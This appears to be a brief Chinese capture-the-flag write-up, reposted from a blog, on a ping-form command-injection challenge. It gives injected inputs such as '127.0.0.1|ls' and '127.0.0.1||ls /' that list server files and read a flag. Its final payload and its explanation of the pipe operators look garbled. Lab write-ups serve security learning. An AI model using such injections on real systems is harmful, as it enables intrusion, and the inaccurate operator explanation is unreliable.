标签:ctf 注意 str dex ping ima class 命令 img
打开靶机
随便ping一下
使用命令管道符 | 列出文件
127.0.0.1|ls
只有一个index.php文件,查看一下目录(居然没过滤!)
127.0.0.1||ls /
直接拿走flag就是了
127.0.0.1||ls /cat /flag //注意空格
知识点:
管道符的使用:
连续使用管道意味着第一个命令的输出会作为 第二个命令的输入,也就是返回上一级
一定注意空格!!
标签:ctf 注意 str dex ping ima class 命令 img
原文地址:https://www.cnblogs.com/forchan/p/14491111.html
